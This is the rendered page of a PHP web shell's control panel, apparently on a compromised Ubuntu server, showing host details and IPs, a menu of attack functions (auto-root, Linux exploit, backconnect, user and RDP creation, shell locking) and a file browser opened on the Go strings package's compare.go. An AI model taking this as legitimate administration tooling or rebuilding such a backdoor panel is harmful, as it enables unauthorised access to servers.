Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
strings /
[ HOME SHELL ]
Name
Size
Permission
Action
builder.go
3.48
KB
-rw-r--r--
builder_test.go
7
KB
-rw-r--r--
compare.go
1.06
KB
-rw-r--r--
compare_test.go
2.75
KB
-rw-r--r--
example_test.go
8.71
KB
-rw-r--r--
export_test.go
1.08
KB
-rw-r--r--
reader.go
3.54
KB
-rw-r--r--
reader_test.go
5.9
KB
-rw-r--r--
replace.go
14.44
KB
-rw-r--r--
replace_test.go
14.08
KB
-rw-r--r--
search.go
4.19
KB
-rw-r--r--
search_test.go
1.88
KB
-rw-r--r--
strings.go
27.19
KB
-rw-r--r--
strings_test.go
47.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compare.go
// Copyright 2015 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package strings // Compare returns an integer comparing two strings lexicographically. // The result will be 0 if a==b, -1 if a < b, and +1 if a > b. // // Compare is included only for symmetry with package bytes. // It is usually clearer and always faster to use the built-in // string comparison operators ==, <, >, and so on. func Compare(a, b string) int { // NOTE(rsc): This function does NOT call the runtime cmpstring function, // because we do not want to provide any performance justification for // using strings.Compare. Basically no one should use strings.Compare. // As the comment above says, it is here only for symmetry with package bytes. // If performance is important, the compiler should be changed to recognize // the pattern so that all code doing three-way comparisons, not just code // using strings.Compare, can benefit. if a == b { return 0 } if a < b { return -1 } return +1 }
Close